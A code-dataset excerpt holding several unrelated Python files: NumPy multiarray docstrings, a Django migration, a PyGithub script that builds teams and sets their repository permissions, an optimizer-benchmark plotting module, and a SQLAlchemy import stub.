Values to put into `a` where `mask` is True. If `values` is smaller
than `a` it will be repeated.
See Also
--------
place, put, take, copyto
Examples
--------
>>> x = np.arange(6).reshape(2, 3)
>>> np.putmask(x, x>2, x**2)
>>> x
array([[ 0, 1, 2],
[ 9, 16, 25]])
If `values` is smaller than `a` it is repeated:
>>> x = np.arange(5)
>>> np.putmask(x, x>1, [-33, -44])
>>> x
array([ 0, 1, -33, -44, -33])
"""
return (a, mask, values)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.packbits)
def packbits(a, axis=None, bitorder='big'):
"""
packbits(a, /, axis=None, bitorder='big')
Packs the elements of a binary-valued array into bits in a uint8 array.
The result is padded to full bytes by inserting zero bits at the end.
Parameters
----------
a : array_like
An array of integers or booleans whose elements should be packed to
bits.
axis : int, optional
The dimension over which bit-packing is done.
``None`` implies packing the flattened array.
bitorder : {'big', 'little'}, optional
The order of the input bits. 'big' will mimic bin(val),
``[0, 0, 0, 0, 0, 0, 1, 1] => 3 = 0b00000011``, 'little' will
reverse the order so ``[1, 1, 0, 0, 0, 0, 0, 0] => 3``.
Defaults to 'big'.
.. versionadded:: 1.17.0
Returns
-------
packed : ndarray
Array of type uint8 whose elements represent bits corresponding to the
logical (0 or nonzero) value of the input elements. The shape of
`packed` has the same number of dimensions as the input (unless `axis`
is None, in which case the output is 1-D).
See Also
--------
unpackbits: Unpacks elements of a uint8 array into a binary-valued output
array.
Examples
--------
>>> a = np.array([[[1,0,1],
... [0,1,0]],
... [[1,1,0],
... [0,0,1]]])
>>> b = np.packbits(a, axis=-1)
>>> b
array([[[160],
[ 64]],
[[192],
[ 32]]], dtype=uint8)
Note that in binary 160 = 1010 0000, 64 = 0100 0000, 192 = 1100 0000,
and 32 = 0010 0000.
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.unpackbits)
def unpackbits(a, axis=None, count=None, bitorder='big'):
"""
unpackbits(a, /, axis=None, count=None, bitorder='big')
Unpacks elements of a uint8 array into a binary-valued output array.
Each element of `a` represents a bit-field that should be unpacked
into a binary-valued output array. The shape of the output array is
either 1-D (if `axis` is ``None``) or the same shape as the input
array with unpacking done along the axis specified.
Parameters
----------
a : ndarray, uint8 type
Input array.
axis : int, optional
The dimension over which bit-unpacking is done.
``None`` implies unpacking the flattened array.
count : int or None, optional
The number of elements to unpack along `axis`, provided as a way
of undoing the effect of packing a size that is not a multiple
of eight. A non-negative number means to only unpack `count`
bits. A negative number means to trim off that many bits from
the end. ``None`` means to unpack the entire array (the
default). Counts larger than the available number of bits will
add zero padding to the output. Negative counts must not
exceed the available number of bits.
.. versionadded:: 1.17.0
bitorder : {'big', 'little'}, optional
The order of the returned bits. 'big' will mimic bin(val),
``3 = 0b00000011 => [0, 0, 0, 0, 0, 0, 1, 1]``, 'little' will reverse
the order to ``[1, 1, 0, 0, 0, 0, 0, 0]``.
Defaults to 'big'.
.. versionadded:: 1.17.0
Returns
-------
unpacked : ndarray, uint8 type
The elements are binary-valued (0 or 1).
See Also
--------
packbits : Packs the elements of a binary-valued array into bits in
a uint8 array.
Examples
--------
>>> a = np.array([[2], [7], [23]], dtype=np.uint8)
>>> a
array([[ 2],
[ 7],
[23]], dtype=uint8)
>>> b = np.unpackbits(a, axis=1)
>>> b
array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1]], dtype=uint8)
>>> c = np.unpackbits(a, axis=1, count=-3)
>>> c
array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0]], dtype=uint8)
>>> p = np.packbits(b, axis=0)
>>> np.unpackbits(p, axis=0)
array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], dtype=uint8)
>>> np.array_equal(b, np.unpackbits(p, axis=0, count=b.shape[0]))
True
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.shares_memory)
def shares_memory(a, b, max_work=None):
"""
shares_memory(a, b, /, max_work=None)
Determine if two arrays share memory.
.. warning::
This function can be exponentially slow for some inputs, unless
`max_work` is set to a finite number or ``MAY_SHARE_BOUNDS``.
If in doubt, use `numpy.may_share_memory` instead.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem (maximum number
of candidate solutions to consider). The following special
values are recognized:
max_work=MAY_SHARE_EXACT (default)
The problem is solved exactly. In this case, the function returns
True only if there is an element shared between the arrays. Finding
the exact solution may take extremely long in some cases.
max_work=MAY_SHARE_BOUNDS
Only the memory bounds of a and b are checked.
Raises
------
numpy.TooHardError
Exceeded max_work.
Returns
-------
out : bool
See Also
--------
may_share_memory
Examples
--------
>>> x = np.array([1, 2, 3, 4])
>>> np.shares_memory(x, np.array([5, 6, 7]))
False
>>> np.shares_memory(x[::2], x)
True
>>> np.shares_memory(x[::2], x[1::2])
False
Checking whether two arrays share memory is NP-complete, and
runtime may increase exponentially in the number of
dimensions. Hence, `max_work` should generally be set to a finite
number, as it is possible to construct examples that take
extremely long to run:
>>> from numpy.lib.stride_tricks import as_strided
>>> x = np.zeros([192163377], dtype=np.int8)
>>> x1 = as_strided(x, strides=(36674, 61119, 85569), shape=(1049, 1049, 1049))
>>> x2 = as_strided(x[64023025:], strides=(12223, 12224, 1), shape=(1049, 1049, 1))
>>> np.shares_memory(x1, x2, max_work=1000)
Traceback (most recent call last):
...
numpy.TooHardError: Exceeded max_work
Running ``np.shares_memory(x1, x2)`` without `max_work` set takes
around 1 minute for this case. It is possible to find problems
that take still significantly longer.
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.may_share_memory)
def may_share_memory(a, b, max_work=None):
"""
may_share_memory(a, b, /, max_work=None)
Determine if two arrays might share memory
A return of True does not necessarily mean that the two arrays
share any element. It just means that they *might*.
Only the memory bounds of a and b are checked by default.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem. See
`shares_memory` for details. Default for ``may_share_memory``
is to do a bounds check.
Returns
-------
out : bool
See Also
--------
shares_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
>>> x = np.zeros([3, 4])
>>> np.may_share_memory(x[:,0], x[:,1])
True
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.is_busday)
def is_busday(dates, weekmask=None, holidays=None, busdaycal=None, out=None):
"""
is_busday(dates, weekmask='1111100', holidays=None, busdaycal=None, out=None)
Calculates which of the given dates are valid days, and which are not.
.. versionadded:: 1.7.0
Parameters
----------
dates : array_like of datetime64[D]
The array of dates to process.
weekmask : str or array_like of bool, optional
A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of bool, optional
If provided, this array is filled with the result.
Returns
-------
out : array of bool
An array with the same shape as ``dates``, containing True for
each valid day, and False for each invalid day.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
busday_offset : Applies an offset counted in valid days.
busday_count : Counts how many valid days are in a half-open date range.
Examples
--------
>>> # The weekdays are Friday, Saturday, and Monday
... np.is_busday(['2011-07-01', '2011-07-02', '2011-07-18'],
... holidays=['2011-07-01', '2011-07-04', '2011-07-17'])
array([False, False, True])
"""
return (dates, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.busday_offset)
def busday_offset(dates, offsets, roll=None, weekmask=None, holidays=None,
busdaycal=None, out=None):
"""
busday_offset(dates, offsets, roll='raise', weekmask='1111100', holidays=None, busdaycal=None, out=None)
First adjusts the date to fall on a valid day according to
the ``roll`` rule, then applies offsets to the given dates
counted in valid days.
.. versionadded:: 1.7.0
Parameters
----------
dates : array_like of datetime64[D]
The array of dates to process.
offsets : array_like of int
The array of offsets, which is broadcast with ``dates``.
roll : {'raise', 'nat', 'forward', 'following', 'backward', 'preceding', 'modifiedfollowing', 'modifiedpreceding'}, optional
How to treat dates that do not fall on a valid day. The default
is 'raise'.
* 'raise' means to raise an exception for an invalid day.
* 'nat' means to return a NaT (not-a-time) for an invalid day.
* 'forward' and 'following' mean to take the first valid day
later in time.
* 'backward' and 'preceding' mean to take the first valid day
earlier in time.
* 'modifiedfollowing' means to take the first valid day
later in time unless it is across a Month boundary, in which
case to take the first valid day earlier in time.
* 'modifiedpreceding' means to take the first valid day
earlier in time unless it is across a Month boundary, in which
case to take the first valid day later in time.
weekmask : str or array_like of bool, optional
A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of datetime64[D], optional
If provided, this array is filled with the result.
Returns
-------
out : array of datetime64[D]
An array with a shape from broadcasting ``dates`` and ``offsets``
together, containing the dates with offsets applied.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
is_busday : Returns a boolean array indicating valid days.
busday_count : Counts how many valid days are in a half-open date range.
Examples
--------
>>> # First business day in October 2011 (not accounting for holidays)
... np.busday_offset('2011-10', 0, roll='forward')
numpy.datetime64('2011-10-03')
>>> # Last business day in February 2012 (not accounting for holidays)
... np.busday_offset('2012-03', -1, roll='forward')
numpy.datetime64('2012-02-29')
>>> # Third Wednesday in January 2011
... np.busday_offset('2011-01', 2, roll='forward', weekmask='Wed')
numpy.datetime64('2011-01-19')
>>> # 2012 Mother's Day in Canada and the U.S.
... np.busday_offset('2012-05', 1, roll='forward', weekmask='Sun')
numpy.datetime64('2012-05-13')
>>> # First business day on or after a date
... np.busday_offset('2011-03-20', 0, roll='forward')
numpy.datetime64('2011-03-21')
>>> np.busday_offset('2011-03-22', 0, roll='forward')
numpy.datetime64('2011-03-22')
>>> # First business day after a date
... np.busday_offset('2011-03-20', 1, roll='backward')
numpy.datetime64('2011-03-21')
>>> np.busday_offset('2011-03-22', 1, roll='backward')
numpy.datetime64('2011-03-23')
"""
return (dates, offsets, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.busday_count)
def busday_count(begindates, enddates, weekmask=None, holidays=None,
busdaycal=None, out=None):
"""
busday_count(begindates, enddates, weekmask='1111100', holidays=[], busdaycal=None, out=None)
Counts the number of valid days between `begindates` and
`enddates`, not including the day of `enddates`.
If ``enddates`` specifies a date value that is earlier than the
corresponding ``begindates`` date value, the count will be negative.
.. versionadded:: 1.7.0
Parameters
----------
begindates : array_like of datetime64[D]
The array of the first dates for counting.
enddates : array_like of datetime64[D]
The array of the end dates for counting, which are excluded
from the count themselves.
weekmask : str or array_like of bool, optional
A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of int, optional
If provided, this array is filled with the result.
Returns
-------
out : array of int
An array with a shape from broadcasting ``begindates`` and ``enddates``
together, containing the number of valid days between
the begin and end dates.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
is_busday : Returns a boolean array indicating valid days.
busday_offset : Applies an offset counted in valid days.
Examples
--------
>>> # Number of weekdays in January 2011
... np.busday_count('2011-01', '2011-02')
21
>>> # Number of weekdays in 2011
>>> np.busday_count('2011', '2012')
260
>>> # Number of Saturdays in 2011
... np.busday_count('2011', '2012', weekmask='Sat')
53
"""
return (begindates, enddates, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(
_multiarray_umath.datetime_as_string)
def datetime_as_string(arr, unit=None, timezone=None, casting=None):
"""
datetime_as_string(arr, unit=None, timezone='naive', casting='same_kind')
Convert an array of datetimes into an array of strings.
Parameters
----------
arr : array_like of datetime64
The array of UTC timestamps to format.
unit : str
One of None, 'auto', or a :ref:`datetime unit <arrays.dtypes.dateunits>`.
timezone : {'naive', 'UTC', 'local'} or tzinfo
Timezone information to use when displaying the datetime. If 'UTC', end
with a Z to indicate UTC time. If 'local', convert to the local timezone
first, and suffix with a +-#### timezone offset. If a tzinfo object,
then do as with 'local', but use the specified timezone.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}
Casting to allow when changing between datetime units.
Returns
-------
str_arr : ndarray
An array of strings the same shape as `arr`.
Examples
--------
>>> import pytz
>>> d = np.arange('2002-10-27T04:30', 4*60, 60, dtype='M8[m]')
>>> d
array(['2002-10-27T04:30', '2002-10-27T05:30', '2002-10-27T06:30',
'2002-10-27T07:30'], dtype='datetime64[m]')
Setting the timezone to UTC shows the same information, but with a Z suffix
>>> np.datetime_as_string(d, timezone='UTC')
array(['2002-10-27T04:30Z', '2002-10-27T05:30Z', '2002-10-27T06:30Z',
'2002-10-27T07:30Z'], dtype='<U35')
Note that we picked datetimes that cross a DST boundary. Passing in a
``pytz`` timezone object will print the appropriate offset
>>> np.datetime_as_string(d, timezone=pytz.timezone('US/Eastern'))
array(['2002-10-27T00:30-0400', '2002-10-27T01:30-0400',
'2002-10-27T01:30-0500', '2002-10-27T02:30-0500'], dtype='<U39')
Passing in a unit will change the precision
>>> np.datetime_as_string(d, unit='h')
array(['2002-10-27T04', '2002-10-27T05', '2002-10-27T06', '2002-10-27T07'],
dtype='<U32')
>>> np.datetime_as_string(d, unit='s')
array(['2002-10-27T04:30:00', '2002-10-27T05:30:00', '2002-10-27T06:30:00',
'2002-10-27T07:30:00'], dtype='<U38')
'casting' can be used to specify whether precision can be changed
>>> np.datetime_as_string(d, unit='h', casting='safe')
Traceback (most recent call last):
...
TypeError: Cannot create a datetime string as units 'h' from a NumPy
datetime with units 'm' according to the rule 'safe'
"""
return (arr,)
|
py | 1a37edc740cc89c117faa7260208793769631655 | # Generated by Django 3.1.8 on 2021-08-24 13:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("organizations", "0032_auto_20210824_1457"),
("permissions", "0008_auto_20210824_1500"),
]
operations = [
migrations.AlterField(
model_name="responsiblegroup",
name="organization",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="permission_groups",
to="organizations.organization",
),
),
]
|
py | 1a37ee4ba755a1a25a644e23caa415d8308d0475 | # Third party
from github import UnknownObjectException
# Local
from utils import (
set_up_github_client,
get_cc_organization,
get_team_slug_name
)
PERMISSIONS = {
'Project Contributor': None,
'Project Collaborator': 'triage',
'Project Core Committer': 'push',
'Project Maintainer': 'maintain'
}
def create_teams_for_data(databag):
client = set_up_github_client()
organization = get_cc_organization(client)
print("Creating and populating teams...")
projects = databag["projects"]
for project in projects:
project_name = project["name"]
print(f" Creating and populating teams for project {project_name}...")
roles = project["roles"]
for role, members in roles.items():
if PERMISSIONS[role] is None:
print(f" Skipping {role} as it has no privileges.")
continue
print(f" Finding team for role {role}...")
team = map_role_to_team(organization, project_name, role)
print(" Done.")
print(f" Populating repos for team {team.name}...")
repos = project["repos"]
map_team_to_repos(organization, team, repos, True)
set_team_repo_permissions(team, PERMISSIONS[role])
print(" Done.")
print(f" Populating members for team {team.name}...")
members = [member["github"] for member in members]
map_team_to_members(client, team, members, True)
print(" Done.")
print(" Done.")
print("Done.")
def map_team_to_members(client, team, final_user_logins, non_destructive=False):
"""
Map the team to the given set of members. Any members that are not already
a part of the team will be added and any additional members that are a part
of the team will be removed, unless chosen not to.
@param client: the GitHub client
@param team: the Team object representing the team
@param final_user_logins: the list of users to associate with the team
@param non_destructive: whether to trim extra repos or preserve them
"""
initial_users = team.get_members()
initial_user_logins = [user.login for user in initial_users]
if not non_destructive:
users_to_drop = [
member
for member in initial_users
if member.login not in final_user_logins
]
for user in users_to_drop:
team.remove_membership(user)
users_to_add = [
client.get_user(login)
for login in final_user_logins
if login not in initial_user_logins
]
for user in users_to_add:
team.add_membership(user)
current_login = client.get_user().login
if current_login not in final_user_logins:
current_user = client.get_user(current_login)
team.remove_membership(current_user)
def map_team_to_repos(organization, team, final_repo_names, non_destructive=False):
"""
Map the team to the given set of repositories. Any repositories that are
not already a part of the team will be added and any additional repositories
that are a part of the team will be removed, unless chosen not to.
@param organization: the Organisation object of which the team is a part
@param team: the Team object representing the team
@param final_repo_names: the list of repo names to associate with the team
@param non_destructive: whether to trim extra repos or preserve them
"""
initial_repos = team.get_repos()
initial_repo_names = [repo.name for repo in initial_repos]
if not non_destructive:
repos_to_drop = [
repo
for repo in initial_repos
if repo.name not in final_repo_names
]
for repo in repos_to_drop:
team.remove_from_repos(repo)
repos_to_add = [
organization.get_repo(repo_name)
for repo_name in final_repo_names
if repo_name not in initial_repo_names
]
for repo in repos_to_add:
team.add_to_repos(repo)
def set_team_repo_permissions(team, permission):
"""
Set the given permission for each repository belonging to the team. The
permissions are determined by the role corresponding to team.
@param team: the team to update the permissions for
@param permission: the permission to set on each repo assigned to the team
"""
repos = team.get_repos()
for repo in repos:
print(f" Populating {permission} permission on {repo} repo...")
team.set_repo_permission(repo, permission)
print(" Done.")
def map_role_to_team(organization, project_name, role, create_if_absent=True):
"""
Map the given role in the given project to a team. Creates the team if one
such does not already exist.
@param organization: the Organisation object of which the team is a part
@param project_name: the name of the project to which the team belongs
@param role: the role held by folks in the team
@param create_if_absent: whether to create the team if it does not exist
@return: the team associated with the role
"""
team_slug, team_name = get_team_slug_name(project_name, role)
properties = {
'name': team_name,
'description': (f'Community Team for {project_name} '
f'containing folks with the role "{role}"'),
'privacy': 'closed'
}
try:
team = organization.get_team_by_slug(team_slug)
print(" Team exists, reconciling...")
if team.description == properties['description']:
del properties['description']
if team.privacy == properties['privacy']:
del properties['privacy']
if properties:
team.edit(**properties)
print(" Done.")
except UnknownObjectException:
if not create_if_absent:
print(" Did not exist, not creating.")
team = None
else:
print(" Did not exist, creating...")
team = organization.create_team(**properties)
print(" Done.")
return team
|
py | 1a37eed3548a443d289184970fb4917881533984 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import argparse
import itertools
from pathlib import Path
from typing import Iterator, List, Optional, Any
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib import cm
from ..common import tools
from ..common.typetools import PathLike
# pylint: disable=too-many-locals
_DPI = 100
# %% Basic tools
def _make_style_generator() -> Iterator[str]:
lines = itertools.cycle(["-", "--", ":", "-."]) # 4
markers = itertools.cycle("ov^<>8sp*hHDd") # 13
colors = itertools.cycle("bgrcmyk") # 7
return (l + m + c for l, m, c in zip(lines, markers, colors))
class NameStyle(dict):
"""Provides a style for each name, and keeps to it
"""
def __init__(self) -> None:
super().__init__()
self._gen = _make_style_generator()
def __getitem__(self, name: str) -> Any:
if name not in self:
self[name] = next(self._gen)
return super().__getitem__(name)
def _make_winners_df(df: pd.DataFrame, all_optimizers: List[str]) -> tools.Selector:
"""Finds mean loss over all runs for each of the optimizers, and creates a matrix
winner_ij = 1 if opt_i is better (lower loss) then opt_j (and .5 for ties)
"""
if not isinstance(df, tools.Selector):
df = tools.Selector(df)
all_optim_set = set(all_optimizers)
assert all(x in all_optim_set for x in df.unique("optimizer_name"))
assert all(x in df.columns for x in ["optimizer_name", "loss"])
winners = tools.Selector(index=all_optimizers, columns=all_optimizers, data=0.)
grouped = df.loc[:, ["optimizer_name", "loss"]].groupby(["optimizer_name"]).mean()
df_optimizers = list(grouped.index)
values = np.array(grouped)
diffs = values - values.T
# loss_ij = 1 means opt_i beats opt_j once (beating means getting a lower loss/regret)
winners.loc[df_optimizers, df_optimizers] = (diffs < 0) + .5 * (diffs == 0)
return winners
def _make_sorted_winrates_df(victories: pd.DataFrame) -> pd.DataFrame:
"""Converts a dataframe counting number of victories into a sorted
winrate dataframe. The algorithm which performs better than all other
algorithms comes first.
"""
assert all(x == y for x, y in zip(victories.index, victories.columns))
winrates = victories / (victories + victories.T)
mean_win = winrates.mean(axis=1).sort_values(ascending=False)
return winrates.loc[mean_win.index, mean_win.index]
# %% plotting functions
def remove_errors(df: pd.DataFrame) -> tools.Selector:
df = tools.Selector(df)
if "error" not in df.columns: # backward compatibility
return df # type: ignore
# errors with no recommendation
errordf = df.select(error=lambda x: isinstance(x, str) and x, loss=np.isnan)
for _, row in errordf.iterrows():
print(f'Removing "{row["optimizer_name"]}" with dimension {row["dimension"]}: got error "{row["error"]}".')
# error with recoreded recommendation
handlederrordf = df.select(error=lambda x: isinstance(x, str) and x, loss=lambda x: not np.isnan(x))
for _, row in handlederrordf.iterrows():
print(f'Keeping non-optimal recommendation of "{row["optimizer_name"]}" '
f'with dimension {row["dimension"]} which raised "{row["error"]}".')
err_inds = set(errordf.index)
output = df.loc[[i for i in df.index if i not in err_inds], [c for c in df.columns if c != "error"]]
assert not output.loc[:, "loss"].isnull().values.any(), "Some nan values remain while there should not be any!"
output = tools.Selector(output.reset_index(drop=True))
return output # type: ignore
def create_plots(df: pd.DataFrame, output_folder: PathLike, max_combsize: int = 1) -> None:
"""Saves all representing plots to the provided folder
Parameters
----------
df: pd.DataFrame
the experiment data
output_folder: PathLike
path of the folder where the plots should be saved
max_combsize: int
maximum number of parameters to fix (combinations) when creating experiment plots
"""
df = remove_errors(df)
df.loc[:, "loss"] = pd.to_numeric(df.loc[:, "loss"])
df = tools.Selector(df.fillna("N-A")) # remove NaN in non score values
assert not any("Unnamed: " in x for x in df.columns), f"Remove the unnamed index column: {df.columns}"
assert "error " not in df.columns, f"Remove error rows before plotting"
required = {"optimizer_name", "budget", "loss", "elapsed_time", "elapsed_budget"}
missing = required - set(df.columns)
assert not missing, f"Missing fields: {missing}"
output_folder = Path(output_folder)
os.makedirs(output_folder, exist_ok=True)
# check which descriptors do vary
descriptors = sorted(set(df.columns) - (required | {"seed"})) # all other columns are descriptors
to_drop = [x for x in descriptors if len(df.unique(x)) == 1]
df = tools.Selector(df.loc[:, [x for x in df.columns if x not in to_drop]])
descriptors = sorted(set(df.columns) - (required | {"seed"})) # now those should be actual interesting descriptors
print(f"Descriptors: {descriptors}")
#
# fight plot
# choice of the combination variables to fix
fight_descriptors = descriptors + ["budget"] # budget can be used as a descriptor for fight plots
combinable = [x for x in fight_descriptors if len(df.unique(x)) > 1] # should be all now
num_rows = 6
for fixed in list(itertools.chain.from_iterable(itertools.combinations(combinable, order) for order in range(max_combsize + 1))):
# choice of the cases with values for the fixed variables
for case in df.unique(fixed):
print("\n# new case #", fixed, case)
casedf = df.select(**dict(zip(fixed, case)))
name = "fight_" + ",".join("{}{}".format(x, y) for x, y in zip(fixed, case)) + ".png"
name = "fight_all.png" if name == "fight_.png" else name
make_fight_plot(casedf, fight_descriptors, num_rows, output_folder / name)
plt.close("all")
#
# xp plots
# plot mean loss / budget for each optimizer for 1 context
name_style = NameStyle() # keep the same style for each algorithm
for case in df.unique(descriptors):
subdf = df.select_and_drop(**dict(zip(descriptors, case)))
description = ",".join("{}:{}".format(x, y) for x, y in zip(descriptors, case))
out_filepath = output_folder / "xpresults{}{}.png".format("_" if description else "", description.replace(":", ""))
make_xpresults_plot(subdf, description, out_filepath, name_style)
plt.close("all")
def make_xpresults_plot(df: pd.DataFrame, title: str, output_filepath: Optional[PathLike] = None,
name_style: Optional[dict] = None) -> None:
"""Creates a xp result plot out of the given dataframe: regret with respect to budget for
each optimizer after averaging on all experiments (it is good practice to use a df
which is filtered out for one set of input parameters)
Parameters
----------
df: pd.DataFrame
run data
title: str
title of the plot
output_filepath: Path
If present, saves the plot to the given path
name_style: dict
a dict or dict-like object providing a line style for each optimizer name.
(can be helpful for consistency across plots)
"""
if name_style is None:
name_style = NameStyle()
df = tools.Selector(df.loc[:, ["optimizer_name", "budget", "loss"]])
groupeddf = df.groupby(["optimizer_name", "budget"]).mean()
groupeddf_std = df.groupby(["optimizer_name", "budget"]).std().loc[groupeddf.index, :] # std is currently unused
plt.clf()
plt.xlabel("Budget")
plt.ylabel("Loss")
plt.grid(True, which='both')
optim_vals = {}
# extract name and coordinates
for optim in df.unique("optimizer_name"):
xvals = np.array(groupeddf.loc[optim, :].index)
yvals = np.maximum(1e-30, np.array(groupeddf.loc[optim, :].loc[:, "loss"])) # avoid small vals for logplot
stds = groupeddf_std.loc[optim, :].loc[:, "loss"]
optim_name = optim.replace("Search", "").replace("oint", "t").replace("Optimizer", "")
optim_vals[optim_name] = {"x": xvals, "y": yvals, "std": stds}
# lower upper bound to twice stupid/idiot at most
upperbound = max(np.max(vals["y"]) for vals in optim_vals.values())
for optim, vals in optim_vals.items():
if optim.lower() in ["stupid", "idiot"] or optim in ["Zero", "StupidRandom"]:
upperbound = min(upperbound, 2 * np.max(vals["y"]))
# plot from best to worst
lowerbound = np.inf
handles = []
sorted_optimizers = sorted(optim_vals, key=lambda x: optim_vals[x]["y"][-1], reverse=True)
for k, optim_name in enumerate(sorted_optimizers):
vals = optim_vals[optim_name]
lowerbound = min(lowerbound, np.min(vals["y"]))
handles.append(plt.loglog(vals["x"], vals["y"], name_style[optim_name], label=optim_name))
texts = []
if vals["x"].size and vals["y"][-1] < upperbound:
angle = 30 - 60 * k / len(optim_vals)
texts.append(plt.text(vals["x"][-1], vals["y"][-1], "{} ({:.3g})".format(optim_name, vals["y"][-1]),
{'ha': 'left', 'va': 'top' if angle < 0 else 'bottom'}, rotation=angle))
if upperbound < np.inf:
plt.gca().set_ylim(lowerbound, upperbound)
# global info
legend = plt.legend(fontsize=7, ncol=2, handlelength=3,
loc='upper center', bbox_to_anchor=(0.5, -0.15))
plt.title(title)
# plt.tight_layout()
# plt.axis('tight')
# plt.tick_params(axis='both', which='both')
if output_filepath is not None:
plt.savefig(str(output_filepath), bbox_extra_artists=[legend] + texts, bbox_inches='tight', dpi=_DPI)
def make_fight_plot(df: tools.Selector, categories: List[str], num_rows: int, output_filepath: Optional[PathLike] = None) -> None:
"""Creates a fight plot out of the given dataframe, by iterating over all cases with fixed category variables.
Parameters
----------
df: pd.DataFrame
run data
categories: list
List of variables to fix for obtaining similar run conditions
num_rows: int
number of rows to plot (best algorithms)
output_filepath: Path
If present, saves the plot to the given path
"""
all_optimizers = list(df.unique("optimizer_name")) # optimizers for which no run exists are not shown
num_rows = min(num_rows, len(all_optimizers))
victories = pd.DataFrame(index=all_optimizers, columns=all_optimizers, data=0.)
# iterate on all sub cases
subcases = df.unique(categories)
for subcase in subcases: # TODO linearize this (precompute all subcases)? requires memory
subdf = df.select(**dict(zip(categories, subcase)))
victories += _make_winners_df(subdf, all_optimizers)
winrates = _make_sorted_winrates_df(victories)
mean_win = winrates.mean(axis=1)
winrates.fillna(.5) # unplayed
sorted_names = winrates.index
# number of subcases actually computed is twice self-victories
sorted_names = ["{} ({}/{})".format(n, int(2 * victories.loc[n, n]), len(subcases)) for n in sorted_names]
data = np.array(winrates.iloc[:num_rows, :])
# make plot
plt.close("all")
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.imshow(100 * data, cmap=cm.seismic, interpolation='none', vmin=0, vmax=100)
ax.set_xticks(list(range(len(sorted_names))))
ax.set_xticklabels([s.replace("Search", "") for s in sorted_names], rotation=90, fontsize=7)
ax.set_yticks(list(range(num_rows)))
# pylint: disable=anomalous-backslash-in-string
ax.set_yticklabels([(f"{name} ({100 * val:2.1f}\%)").replace("Search", "") for name, val in zip(mean_win.index[: num_rows], mean_win)], rotation=45, fontsize=7)
plt.tight_layout()
fig.colorbar(cax, orientation='vertical')
if output_filepath is not None:
plt.savefig(str(output_filepath), dpi=_DPI)
def main() -> None:
parser = argparse.ArgumentParser(description='Create plots from an experiment data file')
parser.add_argument('filepath', type=str, help='filepath containing the experiment data')
parser.add_argument('--output', type=str, default=None,
help="Output path for the CSV file (default: a folder <filename>_plots next to the data file.")
parser.add_argument('--max_combsize', type=int, default=3,
help="maximum number of parameters to fix (combinations) when creating experiment plots")
args = parser.parse_args()
exp_df = tools.Selector.read_csv(args.filepath)
output_dir = args.output
if output_dir is None:
output_dir = str(Path(args.filepath).with_suffix("")) + "_plots"
create_plots(exp_df, output_folder=output_dir, max_combsize=args.max_combsize)
if __name__ == '__main__':
main()
|
py | 1a37efac3b6c597e44346348849821a665cdaa87 | from sqlalchemy import Column, Integer, String, Boolean
from sqlalchemy.ext.declarative import declarative_base
